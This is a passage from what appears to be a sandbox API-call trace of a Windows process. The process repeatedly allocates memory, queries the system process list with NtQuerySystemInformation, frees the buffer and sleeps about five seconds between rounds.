RegionSize=0xdea50*=0x20000) returned 0x0 [0235.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.210] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.313] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.440] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.552] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.659] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.769] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.890] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0236.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.016] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0236.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0236.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0236.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0236.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0236.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0236.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.286] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0236.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0236.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0236.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0236.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0236.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0236.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.616] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0236.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0236.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0236.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0236.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0236.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0236.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.826] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0236.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0236.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0236.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0236.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0236.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0236.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.987] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0236.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0236.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0236.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0236.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0236.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0237.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.107] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0237.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0237.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0237.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0237.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0237.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0237.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.251] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0237.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0237.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0237.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0237.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0237.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0237.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.478] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0237.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0237.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0237.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0237.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0237.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0237.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.625] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0237.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0237.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0237.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0237.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0237.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0237.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.777] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0237.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0237.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0237.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0237.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0237.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0237.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.948] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0237.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0237.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0237.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0237.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0237.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.096] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.242] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.403] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: 